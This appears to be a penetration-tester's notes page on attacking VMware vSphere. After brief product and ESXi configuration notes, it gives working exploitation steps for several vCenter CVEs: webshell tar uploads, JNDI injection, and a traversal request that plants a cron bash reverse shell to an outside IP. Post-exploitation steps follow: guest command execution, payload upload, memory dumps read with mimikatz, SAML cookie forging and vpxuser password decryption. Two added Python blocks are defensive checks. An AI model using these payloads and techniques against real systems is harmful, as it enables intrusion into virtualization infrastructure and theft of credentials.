# VMware vSphere

#### VMware product family <a href="#toc99405081" id="toc99405081"></a>

* Workstation Pro: desktop virtualization for Windows
* Fusion for Mac: virtualization for Mac
* ThinApp: application virtualization solution
* VMware Enterprise PKS: production-grade Kubernetes for multi-cloud enterprises and service providers
* vSAN: vSphere-native storage (storage virtualization)
* vRealize Operations: self-driving IT operations management platform for private, hybrid and multi-cloud environments
* VMware vSphere: server virtualization platform
  * VMware refers to these products collectively as vSphere

<figure><img src="https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2FGP0F96Wm1NwVy2ZVa8Aw%2Fimage.png?alt=media&#x26;token=2159f7c1-bfae-497f-be10-9c04f767bcd8" alt=""><figcaption></figcaption></figure>


vSphere is VMware's virtualization platform suite; it consists of ESXi, vCenter Server and a set of related software.

vSphere has two core components:

* ESXi
  * the virtualization platform used to create and run virtual machines and virtual appliances
* vCenter
  * used to manage multiple hosts connected over the network and to pool their resources

It can be downloaded from the official site, but that is cumbersome:

```bash
#Download site
http://vmv.re/gets
vmvre
 
#Mirror in China
http://42.81.162.1:443/s/Awsw
```

* vCenter Server Appliance (VCSA), for installation on Linux
* VMware Integrated Management (VIM), for installation on Windows


#### ESXi-related configuration <a href="#toc2106402648" id="toc2106402648"></a>

**Password policy**

Upper- and lower-case letters, digits and special characters; password length greater than 7 and less than 40.

```bash
password   requisite    /lib/security/$ISA/pam_passwdqc.so retry=3 min=disabled,disabled,disabled,7,7
```
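As an added example (not part of the original page), the following Python evaluates candidate passwords under the pam_passwdqc line quoted above, following passwdqc's own semantics: `min=disabled,disabled,disabled,7,7` means one- and two-class passwords and passphrases are refused, three- and four-class passwords need at least 7 characters, and the `max` value (passwdqc's default of 40, the upper bound the text refers to) caps the length.

```python
"""Check candidate passwords against ESXi's pam_passwdqc 'min=' policy.

Added example (not from the page). passwdqc reads min=N0,N1,N2,N3,N4 as the
minimum length for one-class, two-class, passphrase, three-class and four-class
passwords; 'disabled' forbids that kind. Passphrases (N2) are not handled here.
"""
import re

# The pam_passwdqc line quoted on the page, joined into one line
POLICY_LINE = ("password   requisite    /lib/security/$ISA/pam_passwdqc.so "
               "retry=3 min=disabled,disabled,disabled,7,7")
MAX_LENGTH = 40  # passwdqc's default max=, the upper bound the page mentions

def parse_min(policy_line):
    """Return the five min= thresholds as ints, with None meaning 'disabled'."""
    m = re.search(r"\bmin=(\S+)", policy_line)
    if m is None:
        raise ValueError("no min= option in policy line")
    fields = m.group(1).split(",")
    if len(fields) != 5:
        raise ValueError("min= must carry exactly five values")
    return [None if f == "disabled" else int(f) for f in fields]

def count_classes(password):
    """Count character classes as passwdqc does: a leading uppercase letter and a
    trailing digit are not credited, so 'Password1' counts as a one-class password."""
    digits = sum(c.isdigit() for c in password)
    lowers = sum(c.islower() for c in password)
    uppers = sum(c.isupper() for c in password)
    others = len(password) - digits - lowers - uppers
    if uppers and password[0].isupper():
        uppers -= 1
    if digits and password[-1].isdigit():
        digits -= 1
    return sum(1 for n in (digits, lowers, uppers, others) if n > 0)

def check_password(password, thresholds, max_length=MAX_LENGTH):
    """Return (accepted, reason) for one password under the parsed thresholds."""
    if not password or len(password) > max_length:
        return False, "length must be 1..%d characters" % max_length
    classes = count_classes(password)
    # min= index for each class count; index 2 is the passphrase rule, unused here
    required = thresholds[{1: 0, 2: 1, 3: 3, 4: 4}.get(classes, 0)]
    if required is None:
        return False, "%d-class passwords are disabled by policy" % classes
    if len(password) < required:
        return False, "%d classes need at least %d characters" % (classes, required)
    return True, "accepted"
```

Note that `Abc!def9` is rejected as a two-class password because passwdqc does not credit the leading capital or the trailing digit, which is why "one of each kind" advice alone does not satisfy this line.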

By default, after 10 failed attempts the account is locked and unlocks automatically after 15 minutes.

By default the ESXi Shell and SSH services are not running, and only the root user can log in to the Direct Console User Interface (DCUI).

ESXi cannot be reached over SSH by default.

Manage --> Services --> start the SSH service

When connected to ESXi you can see whether this host is already joined to a vCenter.

<figure><img src="https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2FGcfalANzdlP4zdRFQ1HI%2Fimage.png?alt=media&#x26;token=d702f8b6-7ccf-4741-a3aa-169c2c68bdae" alt=""><figcaption></figcaption></figure>


Related commands:

```bash
esxcfg-vmknic -l #show the host's VMkernel IP addresses
vim-cmd vmsvc/getallvms #list all virtual machines
esxcli network firewall get #firewall status
esxcli network firewall ruleset list #list firewall rulesets
esxcli network firewall set --enabled true #enable the firewall (false to disable)
```

[https://blog.51cto.com/u\_4674157/](https://blog.51cto.com/u_4674157/3777054)

**Password reset**

Scenario: you have obtained a WebShell and want to log in to vCenter, but the password cannot be cracked; in that case the password can be forcibly reset.

```bash
#Linux: force-reset the SSO administrator password
/usr/lib/vmware-vmdir/bin/vdcadmintool
 
#Windows: force-reset the password
C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe
```

**Uploading SSH keys via HTTPS PUT**

By default the ESXi Shell and SSH services are not started, and only the root user can log in to the Direct Console User Interface. After SSH is enabled only key-based access is allowed, so the SSH key is uploaded with an HTTPS PUT.

Key types and locations:

Authorized keys file for the root user

```bash
https://hostname_or_IP_address/host/ssh_root_authorized_keys
```

You must have full administrator privileges on the host to upload this file.

```bash
DSA key          https://hostname_or_IP_address/host/ssh_host_dsa_key
DSA public key   https://hostname_or_IP_address/host/ssh_host_dsa_key_pub
RSA key          https://hostname_or_IP_address/host/ssh_host_rsa_key
RSA public key   https://hostname_or_IP_address/host/ssh_host_rsa_key_pub
```

The ESXi 401 authentication uses the host's (server) password, not the web front-end password.

{% code overflow="wrap" %}

```bash
https://192.168.238.137/host/
 
#generate an RSA key pair
ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
 
PUT /host/ssh_root_authorized_keys HTTP/1.1
Host: 192.168.238.138
Authorization: Basic cm9vdDoxMjNxd2UhQCMuLi4=
Content-Length: 407
 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZ4gGhuM9GFeh7Kivi0BmxjLy4Brq9V3AEzPlXoXnHWumFC/FJWmZrHVGgDzBL26o/qsPyHnMffJve6egqyaV05+ULiPOzpjoLmG3+7uhhEKfY7KZ/uDMkmeufhvwTBfIIndARqzuAbsx6ekJb794fBhpOG7hPNcziqs5jRRQf9lLUQgltBfReFf6Tj9j2Ff471HlGaVdwKyGp4T3oKpH4K7kgdarMoh1KT2bC9ijHD1TpdQLfNjKJ+uXccaWWG7eEQCYmwQtbL80PVVTq5HTkZaqw+BhSRF8ur0NWX9WC3G4r4vYEc46meh1pwowHn69ZWRuvql1I4IfjytL4totH root@localhost.localdomain
```

{% endcode %}


#### Vulnerability exploitation <a href="#toc1041384141" id="toc1041384141"></a>

* Check the vCenter version: /sdk/vimServiceVersions.xml

**CVE-2021-21972**

Affected versions

* VMware vCenter Server 7.0 series < 7.0.U1c
* VMware vCenter Server 6.7 series < 6.7.U3l
* VMware vCenter Server 6.5 series < 6.5 U3n
* VMware ESXi 7.0 series < ESXi70U1c-17325551
* VMware ESXi 6.7 series < ESXi670-202102401-SG
* VMware ESXi 6.5 series < ESXi650-202102101-SG

**Exploitation on Windows**

Windows vCenter program path:

{% code overflow="wrap" %}

```bash
ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport
#build the tar archive
https://github.com/ptoomey3/evilarc/blob/master/evilarc.py
python evilarc.py -d 2 -p 'ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport' -o win -f winexpl.tar winshe.jsp
```

{% endcode %}

```bash
POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: 192.168.238.132
Cookie: VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL;
VSPHERE-CLIENT-SESSION-INDEX=_f97bb91caea8a2af952cd91ec5d47eb8; VSPHERE-UI-JSESSIONID=0C5DAAED678BDADE5DE0A9599359A141; VSPHERE-UI-XSRF-TOKEN=059001d4-15b3-4ab5-b83f-604c37fb2471; style=light
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1YoXljo9
Content-Length: 10389
 
------WebKitFormBoundary1YoXljo9
Content-Disposition: form-data; name="uploadFile"; filename="winexpl.tar"
 
Paste from file winexpl.tar
------WebKitFormBoundary1YoXljo9--
```

**Exploitation on Linux**

[If it does not succeed, try creating the vsphere-ui user locally first and then generating the key]

{% code overflow="wrap" %}

```bash
python evilarc.py -d 2 -p 'home/vsphere-ui/.ssh' -o unix -f unixshe.tar authorized_keys
ssh vsphere-ui@Your IP
 
#requires a restart
/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/
#Path of the shell on Linux: https://photom-matchine/ui/resources/winshe.jsp
 
#If that does not work, use the following (the script has problems and needs to be rewritten):
https://github.com/NS-Sp4ce/CVE-2021-21972/blob/7048b1d0a71a862284c2d54f78aba913ccef5776/CVE-2021-21972.py
https://0x20h.com/p/7cb6
```

{% endcode %}


**CVE-2021-21985**

* vCenter Server 6.5
* vCenter Server 6.7
* vCenter Server 7.0
* Cloud Foundation (vCenter Server) 3.x
* Cloud Foundation (vCenter Server) 4.x

Linux only

```bash
java -jar JNDIInjection-Bypass.jar 1099 192.168.238.1 8841
 
nc -lvp 8841
 
python3 CVE-2021-21985_exp.py https://192.168.238.149 rmi://192.168.238.146:1099/Exploit
```

<https://github.com/r0ckysec/CVE-2021-21985>

**CVE-2021-22005**

Affected versions:

7.0,6.7,6.5,4.x,3.x

<https://github.com/r0ckysec/CVE-2021-22005>（EXP）

```bash
POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/ce21 HTTP/1.1
Host: 192.168.23.119
Content-Length: 60
 
{"aaa":"bbb"}
```

{% code overflow="wrap" %}

```bash
POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/../../../../../../../../../../../../etc/cron.d/cs21 HTTP/1.1
Host: 192.168.23.119
Content-Length: 60
 
*/1 * * * * root bash -i >& /dev/tcp/192.168.23.77/8091 0>&1
```

{% endcode %}

**vCenter < 6.0: S2-045**

```bash
#Older versions: Struts S2-045
https://vmware/statsreport/vmHome.do
```
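An added example, not part of the original page: a small Python detector that flags, in web-server access logs, the request shapes the vulnerability section above shows (the /sdk/vimServiceVersions.xml version probe, the uploadova POST, the telemetry send with traversal in `_i`, and a PUT to the root authorized_keys file). The log lines are constructed, and the combined-log regex is an assumption about the log format.

```python
"""Flag, in access-log lines, the vCenter/ESXi request patterns this page shows.

Added example, not from the page or from VMware tooling. Covers the version probe,
the CVE-2021-21972 uploadova POST, the CVE-2021-22005 telemetry write with '..'
in _i, and a PUT to the root authorized_keys file. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# client - user [time] "METHOD target HTTP/x" status ... (combined-log shape, assumed)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(method, target):
    """Return a finding label for one request, or None if nothing matches."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = parse_qs(parts.query)  # parse_qs already percent-decodes values
    if method == "GET" and path == "/sdk/vimServiceVersions.xml":
        return "version probe of /sdk/vimServiceVersions.xml"
    if method == "POST" and path.startswith("/ui/vropspluginui/rest/services/uploadova"):
        return "CVE-2021-21972: OVA upload to vropspluginui"
    if path.startswith("/analytics/telemetry/ph/api/hyper/send"):
        # _i ends up in a file name; the traversal form on the page carries '..'
        if any(".." in value for value in query.get("_i", [])):
            return "CVE-2021-22005: telemetry write with traversal in _i"
    if method == "PUT" and path == "/host/ssh_root_authorized_keys":
        return "root authorized_keys replaced via HTTPS PUT"
    return None

def scan(lines):
    """Return (client, status, finding) for every access-log line that matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        client, method, target, status = m.groups()
        label = classify(method, target)
        if label:
            findings.append((client, status, label))
    return findings

# Constructed sample lines, not captured traffic
SAMPLE_LOG = [
    '10.0.0.3 - - [10/Oct/2021:13:54:00 +0000] "GET /sdk/vimServiceVersions.xml HTTP/1.1" 200 2144',
    '10.0.0.5 - - [10/Oct/2021:13:55:36 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 25',
    '10.0.0.7 - - [10/Oct/2021:13:56:01 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/../../../../etc/cron.d/cs21 HTTP/1.1" 201 0',
    '10.0.0.7 - - [10/Oct/2021:13:56:02 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/ce21 HTTP/1.1" 201 0',
    '10.0.0.9 - root [10/Oct/2021:13:57:10 +0000] "PUT /host/ssh_root_authorized_keys HTTP/1.1" 200 0',
]
```

The benign-looking `_i=/ce21` request is deliberately not flagged, so the rule keys on the `..` traversal rather than on the endpoint alone; widen it if the telemetry endpoint is not legitimately used in your environment.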

#### Post-exploitation <a href="#toc551534737" id="toc551534737"></a>

All of the operations below require valid credentials first.

Once the password is obtained, you can:

* read a virtual machine's configuration
* view virtual machine files
* delete virtual machine files
* upload files to a virtual machine
* download files from a virtual machine
* execute commands inside a virtual machine

The old REST API (earlier than vSphere 7.0 U2) does not support the following operations:

* view virtual machine files
* delete virtual machine files
* upload files to a virtual machine
* download files from a virtual machine
* execute commands inside a virtual machine

**SharpSphere**

{% code overflow="wrap" %}

```bash
#If it will not compile:
#Tools --> NuGet Package Manager --> Package Sources --> add the source https://api.nuget.org/v3/index.json
#Gather information
SharpSphere.exe list --url https://192.168.238.138/sdk/ --username root --password 123qwe!@#
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface
[x] Connected to VMware ESXi 6.7.0 build-15160138
[x] Authenticating with provided username and password
[x] Successfully authenticated
Name: Centos7 | Power: poweredOn | OS: CentOS 7 (64-bit) | Tools: guestToolsUnmanaged | IP: 192.168.238.139
 
#Execute a command
.\SharpSphere.exe execute --url https://192.168.238.138/sdk --username root --password 123qwe!@# --ip 192.168.238.141 --guestusername administrator --guestpassword 123qwe!@# --command whoami --output
 
#Upload a file
.\SharpSphere.exe upload --url https://192.168.238.138/sdk --username root --password 123qwe!@# --ip 192.168.238.141 --guestusername administrator --guestpassword 123qwe!@# --source D:\calc.exe --destination C:\Users\Public\payload.exe
 
#Download a file
Z:\>SharpSphere.exe download --url https://URL/sdk --username administrator@vsphere.local --password <PASSWORD> --ip <IP> --guestusername James --guestpassword <PASSWORD> --source C:\Users\Public\payload.exe --destination Z:\result.exe
```

{% endcode %}

**Dumping memory to obtain passwords**

{% code overflow="wrap" %}

```bash
#Dump: currently fails against ESXi (the file cannot be downloaded) but works against vCenter
.\SharpSphere.exe dump --url https://192.168.238.138/sdk/ --username root --password 123qwe!@# --targetvm "Win2008" --destination "C:\Users\Public\" --snapshot
 
#The downloaded snapshot consists of .vmsn and .vmem files
.\vmss2core-sb-8456865.exe -W .\Win2008-Snapshot5.vmsn .\Win2008-Snapshot5.vmem
 
#For Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019 run this command:
vmss2core.exe -W8 virtual_machine_name.vmsn virtual_machine_name.vmem
 
#Load the memory image with WinDbg Preview
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-install-preview
 
#Load mimilib inside the debugger
kd> .load C:\Users\A\Desktop\vmnx\mimikatz_trunk\x64\mimilib.dll
 
#Find the lsass process
kd> !process 0 0 lsass.exe
 
#Switch into that process
kd> .process /r /p fffffa80028f2400
 
#Extract passwords from memory
kd> !mimikatz
```

{% endcode %}

![](https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2FPfHtYlsmZO9g8nuiSdSn%2Fimage.png?alt=media\&token=3960dc01-9c30-4d06-abe6-da3088aae462)&#x20;


**Extension: qcow2 images**

```bash
#open the virtual disk read-only
guestfish --ro -a /var/lib/libvirt/images/centos7.qcow2
><fs> run #launch the appliance and scan the disk
><fs> list-filesystems #list the filesystems
><fs> mount /dev/centos/root / #mount the root filesystem
><fs> cat /etc/shadow
 
#inspect the image and mount its filesystems automatically
guestfish --ro -a /var/lib/libvirt/images/centos7.qcow2 -i
```

**PySharpSphere**

<https://github.com/RicterZ/PySHarpSphere>

This tool is implemented on top of pyVmomi.

{% code overflow="wrap" %}

```bash
#list
pysharpsphere.exe -H 192.168.238.132 -u administrator@vsphere.local -p #jLuNK5[z(,0p6K9Xj7C list
 
#execute a command
pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password execute -t vm-1020 --guest-user administrator --guest-pass guestpassword -c whoami
 
#upload a file
pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password upload -t vm-1020 --guest-user administrator --guest-pass guestpassword --source /tmp/test.exe --dest C:\\c2.exe
 
#dump a snapshot of the VM
pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password dump -t vm-1020
 
#execute a command, authenticating to the guest with an NTLM hash
pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password execute -t vm-1015 --guest-user administrator --guest-ntlm ea41383fa39c20f186cbcdc0ac234417 -c whoami
```

{% endcode %}

In fact all of this can be done from the vCenter UI once logged in:

Create snapshot --> Datastore --> download the snapshot

![](https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2F9Mcsjt9GQdNmpbpFJF6a%2Fimage.png?alt=media\&token=f2316116-2126-46f3-8acc-0b8dcfdc9626)&#x20;

**PowerCLI**

Official documentation: <https://developer.vmware.com/docs/powercli/latest/vmware.vimautomation.core/commands/get-vm/#Default>

{% code overflow="wrap" %}

```bash
#Offline installation
#Download the PowerCLI zip file from:
https://code.vmware.com/doc/preview?id=13693
 
#Get the module path and extract the PowerCLI zip into that directory
$env:PSModulePath
 
#Check whether the installation succeeded
Get-Module -Name VMware.PowerCLI -ListAvailable
 
#Allow the RemoteSigned execution policy
Set-ExecutionPolicy RemoteSigned
 
#Ignore certificate validation
Set-PowerCLIConfiguration -Scope AllUsers -ParticipateInCeip $false -InvalidCertificateAction Ignore
 
#Connect to the server
Connect-VIServer -Server 192.168.238.149 -Protocol https -User Administrator@GIAO.LOCAL -Password Qazxx!@#... -Force
 
#Disconnect
Disconnect-VIServer -Server 192.168.238.149 -Force -Confirm:$false
 
#Upload a file
Copy-VMGuestFile -Source c:\text.txt -Destination c:\temp\ -VM VM -LocalToGuest  -GuestUser user -GuestPassword pass2
 
#Download a file
Copy-VMGuestFile -Source c:\text.txt -Destination c:\temp\ -VM VM -GuestToLocal -GuestUser user -GuestPassword pass2
#First obtain the VM name with Get-VM, then run the command against it:
Invoke-VMScript -VM "Centos7 (1)" -ScriptText "cat /etc/passwd" -GuestUser root -GuestPassword "123qwe!@#"
```

{% endcode %}

![](https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2Fo08d4435bsva6hJ9EVkp%2Fimage.png?alt=media\&token=af317548-6333-464b-ae54-4f7ee469862e)&#x20;

Running commands inside a Windows virtual machine requires VMware Tools to be installed in the guest.

{% code overflow="wrap" %}

```bash
Invoke-VMScript -VM "Win2012" -ScriptText "whoami" -GuestUser administrator -GuestPassword "123qwe!@#"
```

{% endcode %}

<figure><img src="https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2FDfwvB4uVefrtRoKHobsE%2Fimage.png?alt=media&#x26;token=6effe24f-f927-4656-9ac7-05389ad41aa4" alt=""><figcaption></figcaption></figure>

The traffic is encrypted.

<figure><img src="https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2Fb17G8z5pbHcN5z9UJGI8%2Fimage.png?alt=media&#x26;token=b1143c4f-06cb-4e66-93b4-48081a18e8ea" alt=""><figcaption></figcaption></figure>

**vCenter SAML Certificates**

Used after obtaining a WebShell, when you do not want to reset the administrator password.

<https://github.com/horizon3ai/vcenter_saml_login>

Read the certificate material from data.mdb, then use the certificates in a SAML request to obtain an administrator cookie.

```bash
Linux:
/storage/db/vmware-vmdir/data.mdb
Windows:
C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb
python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
```

Browse to the VCSA instance at `https://<VCSA>/ui` and add the cookie for the /ui path.

**Decrypting vpxuser**

<https://github.com/shmilylty/vhost_password_decrypt>

{% code overflow="wrap" %}

```bash
#Get the vc database user's password
cat /etc/vmware-vpx/vcdb.properties
 
#Extract the encrypted passwords on their own
psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc
 
#Get the decryption key
cat /etc/vmware-vpx/ssl/symkey.dat
#Windows: C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat
#Linux: /etc/vmware-vpx/ssl/symkey.dat
#Decrypt
python decrypt.py symkey.dat password.enc pass.txt
```

{% endcode %}

